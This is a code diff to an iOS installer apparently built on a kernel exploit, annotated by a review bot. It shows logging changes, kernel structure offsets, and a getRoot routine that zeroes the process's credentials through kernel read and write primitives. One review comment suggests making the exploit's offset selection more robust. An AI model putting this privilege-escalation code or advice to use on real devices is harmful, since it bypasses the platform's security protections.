diff --git a/Installer/TrollInstaller/TrollInstaller.xcodeproj/project.pbxproj b/Installer/TrollInstaller/TrollInstaller.xcodeproj/project.pbxproj
index f72ac1e..0fa663d 100644
--- a/Installer/TrollInstaller/TrollInstaller.xcodeproj/project.pbxproj
+++ b/Installer/TrollInstaller/TrollInstaller.xcodeproj/project.pbxproj
@@ -388,6 +388,10 @@
 		8CE2BD3A28AD5D730058FBAD /* Debug */ = {
 			isa = XCBuildConfiguration;
 			buildSettings = {
+				ARCHS = (
+					arm64e,
+					arm64,
+				);
 				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
 				ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
 				CODE_SIGN_STYLE = Automatic;
@@ -421,6 +425,10 @@
 		8CE2BD3B28AD5D730058FBAD /* Release */ = {
 			isa = XCBuildConfiguration;
 			buildSettings = {
+				ARCHS = (
+					arm64e,
+					arm64,
+				);
 				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
 				ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
 				CODE_SIGN_STYLE = Automatic;
diff --git a/Installer/TrollInstaller/TrollInstaller/ViewController.m b/Installer/TrollInstaller/TrollInstaller/ViewController.m
index ec2d4c0..c963cfc 100644
--- a/Installer/TrollInstaller/TrollInstaller/ViewController.m
+++ b/Installer/TrollInstaller/TrollInstaller/ViewController.m
@@ -16,6 +16,17 @@
 extern uint64_t g_self_proc;
+void badLog(const char* a, ...)
+{
+	va_list va;
+	va_start(va, a);
+	NSString* af = [NSString stringWithUTF8String:a];
+	NSString* msg = [[NSString alloc] initWithFormat:af arguments:va];
+	va_end(va);
+	NSLog(@"%@",msg);
+	return;
+}
+
 int runBinary(NSString* path, NSArray* args)
 {
 	NSMutableArray* argsM = args.mutableCopy;
@@ -63,7 +74,7 @@ gid_t backup_groupList[200];
 int getRoot(void)
 {
-	printf("attempting to get root...\n");
+	NSLog(@"attempting to get root...\n");
 	usleep(1000);
 	backup_groupSize = getgroups(200, &backup_groupList[0]);
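Review bot: `badLog` hands a caller-supplied C string straight to `initWithFormat:arguments:` as the format, so any call site that ever forwards non-literal text (a path, a string read back from the kernel) becomes a format-string bug, and `stringWithUTF8String:` returns nil on invalid UTF-8, after which `initWithFormat:nil` raises NSInvalidArgumentException. Guard the conversion, `if (!af) { va_end(va); return; }`, and declare the function printf-like in a shared header so the compiler checks every caller: `void badLog(const char* fmt, ...) __attribute__((format(printf, 1, 2)));`. Nothing in the visible hunks calls `badLog` yet, and the trailing `return;` in a void function is noise.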
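Review bot: The trailing `\n` in `NSLog(@"attempting to get root...\n");` is redundant — NSLog terminates each message itself, so every one of these converted lines now produces an empty line in the log; drop it, `NSLog(@"attempting to get root...");`. The same applies to the other printf-to-NSLog conversions in this file. `getRoot`'s body continues past the hunk.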
@@ -71,19 +82,19 @@ int getRoot(void)
 	backup_cred = proc_get_posix_cred(g_self_proc);
 	struct k_posix_cred zero_cred = {0};
-	printf("setting posix cred to zero cred...\n");
+	NSLog(@"setting posix cred to zero cred...\n");
 	usleep(1000);
 	proc_set_posix_cred(g_self_proc, zero_cred);
 	int err = setgroups(0,0);
 	if(err)
 	{
-		printf("setgroups error %d\n", err);
+		NSLog(@"setgroups error %d\n", err);
 		usleep(1000);
 	}
 	int uid = getuid();
-	printf("getuid => %d\n", uid);
+	NSLog(@"getuid => %d\n", uid);
 	usleep(1000);
 	return uid;
@@ -135,6 +146,9 @@ int writeRemountPrivatePreboot(void)
 - (void)doInstallation
 {
+	NSLog(@"TrollStore out here, exploitation starting!");
+	usleep(1000);
+
 	[self updateStatus:@"Exploiting..."];
 	// Run Kernel exploit
@@ -151,6 +165,9 @@ int writeRemountPrivatePreboot(void)
 	km.kwrite_64 = kwrite64;
 	km.kcleanup = exploitation_cleanup;
+	NSLog(@"Exploitation finished, post exploit stuff next!");
+	usleep(1000);
+
 	[self updateStatus:@"Getting root..."];
 	// Get root
diff --git a/Installer/TrollInstaller/TrollInstaller/exploit/kernel_base.c b/Installer/TrollInstaller/TrollInstaller/exploit/kernel_base.c
index cd6d46c..5c40f51 100644
--- a/Installer/TrollInstaller/TrollInstaller/exploit/kernel_base.c
+++ b/Installer/TrollInstaller/TrollInstaller/exploit/kernel_base.c
@@ -9,6 +9,9 @@
 #include
 #include
 #include
+#include
+
+extern void badLog(const char*, ...);
 uint64_t g_self_proc = 0;
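Review bot: `NSLog(@"setgroups error %d\n", err);` logs the return value of setgroups(), which is just -1 on failure, so the message never says why the call failed after the credential swap; capture errno before anything can clobber it and log that instead: `int saved = errno; NSLog(@"setgroups error %d (errno %d)", err, saved);`. The trailing `\n` is redundant with NSLog. `getRoot` starts before the hunk and its closing brace lies after `return uid;`.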
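Review bot: The `usleep(1000);` added after the new NSLog in `doInstallation` has no stated purpose; if it is there so the message lands before the exploit can panic the device, say so in a comment, e.g. `// give the log line a chance to flush in case the exploit panics`, otherwise the next reader will delete it as dead code. If `doInstallation` runs on the main thread (it drives UI through `updateStatus:`, which suggests it might, though I cannot confirm from here), each of these sleeps blocks the UI — harmless at 1 ms, but not a habit to spread. The method body continues past the hunk.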
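Review bot: `extern void badLog(const char*, ...);` is a hand-written prototype for a function defined in ViewController.m; if the definition changes, the compiler cannot catch the mismatch, and without a format attribute it cannot check format strings at call sites either. Put the prototype in a header both files include, declared as `void badLog(const char* fmt, ...) __attribute__((format(printf, 1, 2)));`. Nothing in this diff calls `badLog`, so the declaration may simply be premature. The `#include` targets were stripped in this rendering, so I cannot confirm the new header is the one `uname()` needs (`<sys/utsname.h>`).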
@@ -46,7 +49,25 @@ uint64_t kernel_base_from_holder(mach_port_t holder, uint64_t holder_addr)
 	uint64_t x68 = xpaci(kread64(kmsg + 0x68));
 	uint64_t self_ipc_space = xpaci(kread64(x68 + 0x50));
 	uint64_t self_task = xpaci(kread64(self_ipc_space + 0x30));
-	g_self_proc = xpaci(kread64(self_task + 0x3c8));
+
+	struct utsname u;
+	uname(&u);
+	uint64_t off_task_bsd_info;
+
+#if __arm64e__
+	if (strstr(u.machine, "iPhone14,"))
+	{
+		off_task_bsd_info = 0x3c8; // ios15.1 a15 // proc_t::task_bsd_info
+	}
+	else
+	{
+		off_task_bsd_info = 0x3b8; //; iOS15.1 a12 // proc_t::task_bsd_info
+	}
+#else
+	off_task_bsd_info = 0x3A0;
+#endif
+
+	g_self_proc = xpaci(kread64(self_task + off_task_bsd_info));
 	// find kernel base
 	uint64_t pos = (fops & ~0x3FFF);
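Review bot: The task→proc offset is now selected by device model alone (`strstr(u.machine, "iPhone14,")`) although the comments say the values were taken from iOS 15.1, so the same hardware on another iOS build — or an A15 device whose model string is not `iPhone14,*` — silently gets the wrong offset, and the resulting `g_self_proc` is then handed to `proc_set_posix_cred` elsewhere in this diff, i.e. a kernel write through a garbage pointer. Key the choice on the kernel build as well (`u.release` is already available once `uname` has run) and validate the candidate before anyone uses it: read back a field of the proc whose value is known, such as its pid, compare it with `getpid()`, and fail closed on a mismatch. The return value of `uname(&u)` is unchecked, and the `#else` branch `off_task_bsd_info = 0x3A0;` has no comment saying which device/iOS pair it came from, unlike the two arm64e values. `kernel_base_from_holder` starts and ends outside the hunk.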